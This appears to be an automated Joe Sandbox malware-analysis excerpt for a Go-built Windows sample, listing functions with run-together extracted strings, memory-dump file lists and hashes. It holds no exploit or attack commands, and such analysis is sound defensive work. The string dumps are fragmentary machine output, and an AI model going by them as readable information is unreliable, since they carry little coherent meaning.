                                                                                • to unallocated span37252902984619140625Arabic Standard TimeAssemblyRefProcessorAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWEgyptian_HieroglyphsEnumProcessModulesEx, xrefs: 00AC0344
                                                                                • span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM image, xrefs: 00AC0376
                                                                                • objectpopcntrdtscpreadatsecondselectsendtosocketstringstructsweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5., xrefs: 00AC02F6
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00AC02B1
                                                                                • runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00AC0203
                                                                                • to unused region of span!#$%&'()-@^_`{}~+,.;=[]\/2006-01-02T15:04:05Z07:002910383045673370361328125ARM Thumb-2 little endianAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWFindNextVolumeMountPointWFindVolume, xrefs: 00AC0407
                                                                                • span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetParamECDSA-SH, xrefs: 00AC03A0
                                                                                • runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutextransform: short source bufferx509: SAN dNSName is malformedx509: invalid ECDSA parametersx509: malformed issu, xrefs: 00AC0287
                                                                                • >, xrefs: 00AC0275
                                                                                • found bad pointer in Go heap (incorrect use of unsafe or cgo?) : on an invalid notinheap pointerruntime: internal error: misuse of lockOSThread/unlockOSThreadunhandled exception when parsing data directory %s, reason: %vx509: certif, xrefs: 00AC026C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM image$ span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetParamECDSA-SH$ to unallocated span37252902984619140625Arabic Standard TimeAssemblyRefProcessorAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWEgyptian_HieroglyphsEnumProcessModulesEx$ to unused region of span!#$%&'()-@^_`{}~+,.;=[]\/2006-01-02T15:04:05Z07:002910383045673370361328125ARM Thumb-2 little endianAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWFindNextVolumeMountPointWFindVolume$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$>$found bad pointer in Go heap (incorrect use of unsafe or cgo?) : on an invalid notinheap pointerruntime: internal error: misuse of lockOSThread/unlockOSThreadunhandled exception when parsing data directory %s, reason: %vx509: certif$objectpopcntrdtscpreadatsecondselectsendtosocketstringstructsweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.$runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutextransform: short source bufferx509: SAN dNSName is malformedx509: invalid ECDSA parametersx509: malformed issu$runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version
                                                                                • API String ID: 0-2372745613
                                                                                • Opcode ID: 3c01a3e208c6cd1283b3d1abba0f1f02d0e1d7740e11de7acdd2189b3a457022
                                                                                • Instruction ID: 0b78a9a991aebfd922fb9a594962ec46a6bc7f40b128e357466d6152b04e3fdb
                                                                                • Opcode Fuzzy Hash: 3c01a3e208c6cd1283b3d1abba0f1f02d0e1d7740e11de7acdd2189b3a457022
                                                                                • Instruction Fuzzy Hash: DA51A674909B80DFC300FF75E295B5EBBE4AF48748F81482DE8888B252D774D9449B63
                                                                                Function 00AB1072 Relevance: 11.7, Strings: 9, Instructions: 426COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • GODEBUG: unknown cpu feature "GetProcessPreferredUILanguagesGetSecurityDescriptorRMControlGetSystemTimePreciseAsFileTimeIntel Itanium processor familyMapIter.Key called before NextOleCreatePropertyFrameIndirectPacific Standard Time (Mexico)QueryServiceDynamicI, xrefs: 00AB150F
                                                                                • !, xrefs: 00AB1316
                                                                                • ", missing CPU supportasn1: structure error: bytes.Buffer: too largechan receive (nil chan)close of closed channeldevice or resource busyencoding: invalid UTF-8fatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interru, xrefs: 00AB13E0
                                                                                • GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWImage base beyond allowed addressInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWThunk AddressOfData beyond limitsbytes.Reader.Seek: invalid wh, xrefs: 00AB130D
                                                                                • " not supported for cpu option "ber2der: BER tag length too longbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunecannot represent time as UTCTime : input not full blocked25519: bad public key length: fail to seek to string table: %vfail, xrefs: 00AB12AE
                                                                                • GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusGetRecordInfoFromTypeInfoGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorKaliningrad Standard TimeLPSAFEARRA, xrefs: 00AB13B6
                                                                                • GODEBUG: value "GetAltMonthNamesGetComputerNameWGetCurrentThreadGetFullPathNameWGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassImperial_AramaicKEYVALS UNPAIREDLPSAFEARRAY_SizeManifestResourceMeroitic_CursiveNetApiBufferFreeOACreateTypeLib2OleL, xrefs: 00AB1284
                                                                                • "\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTL, xrefs: 00AB12D8, 00AB1337, 00AB1539
                                                                                • cpu., xrefs: 00AB1193
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTL$" not supported for cpu option "ber2der: BER tag length too longbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunecannot represent time as UTCTime : input not full blocked25519: bad public key length: fail to seek to string table: %vfail$", missing CPU supportasn1: structure error: bytes.Buffer: too largechan receive (nil chan)close of closed channeldevice or resource busyencoding: invalid UTF-8fatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interru$GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusGetRecordInfoFromTypeInfoGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorKaliningrad Standard TimeLPSAFEARRA$GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWImage base beyond allowed addressInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWThunk AddressOfData beyond limitsbytes.Reader.Seek: invalid wh$GODEBUG: unknown cpu feature "GetProcessPreferredUILanguagesGetSecurityDescriptorRMControlGetSystemTimePreciseAsFileTimeIntel Itanium processor familyMapIter.Key called before NextOleCreatePropertyFrameIndirectPacific Standard Time (Mexico)QueryServiceDynamicI$GODEBUG: value "GetAltMonthNamesGetComputerNameWGetCurrentThreadGetFullPathNameWGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassImperial_AramaicKEYVALS UNPAIREDLPSAFEARRAY_SizeManifestResourceMeroitic_CursiveNetApiBufferFreeOACreateTypeLib2OleL$cpu.
                                                                                • API String ID: 0-511396939
                                                                                • Opcode ID: d51c0d84b94ffefb05173fbc8a2b11932a32f6555d402db4818b490d37e54572
                                                                                • Instruction ID: b53fe0c122e9ee1f0a9d0ce4e3daefe700d0fe7ed4ba6679d715e2353ac26338
                                                                                • Opcode Fuzzy Hash: d51c0d84b94ffefb05173fbc8a2b11932a32f6555d402db4818b490d37e54572
                                                                                • Instruction Fuzzy Hash: C1F1E370A087848FC714EF64D5A069EBBF5AF85304F94896DE8859B383D730ED45CB92
                                                                                Function 00ACD230 Relevance: 11.7, Strings: 9, Instructions: 425COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons, xrefs: 00ACD8A6
                                                                                • B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0, xrefs: 00ACD7F2
                                                                                • B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0024414062, xrefs: 00ACD7A2
                                                                                • )*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-, xrefs: 00ACD90F
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACD74E, 00ACD778
                                                                                • [controller reset]bad manualFreeListbufio: buffer fullconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks, xrefs: 00ACD938
                                                                                • exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b, xrefs: 00ACD668
                                                                                • % CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicM, xrefs: 00ACD63E
                                                                                • pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugine, xrefs: 00ACD5FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons$ B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0$ B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0024414062$ exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b$% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicM$)*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$[controller reset]bad manualFreeListbufio: buffer fullconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks$pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugine
                                                                                • API String ID: 0-668479763
                                                                                • Opcode ID: 351f05377709de58face6c5f658600ca16c4895223685d35a3e0b00d4a87cd7c
                                                                                • Instruction ID: 7e3b69806c15ff4895286f0c38cd6ff1a408c7700cf1269761b5b1ff00e0ecb7
                                                                                • Opcode Fuzzy Hash: 351f05377709de58face6c5f658600ca16c4895223685d35a3e0b00d4a87cd7c
                                                                                • Instruction Fuzzy Hash: 84221674908B84CFC364EF29D590B5EBBE5BF89344F118A2EE8C897352DB709845CB42
                                                                                Function 00ACD233 Relevance: 11.6, Strings: 9, Instructions: 355COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons, xrefs: 00ACD8A6
                                                                                • B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0, xrefs: 00ACD7F2
                                                                                • B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0024414062, xrefs: 00ACD7A2
                                                                                • )*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-, xrefs: 00ACD90F
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACD74E, 00ACD778
                                                                                • [controller reset]bad manualFreeListbufio: buffer fullconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks, xrefs: 00ACD938
                                                                                • exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b, xrefs: 00ACD668
                                                                                • % CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicM, xrefs: 00ACD63E
                                                                                • pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugine, xrefs: 00ACD5FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
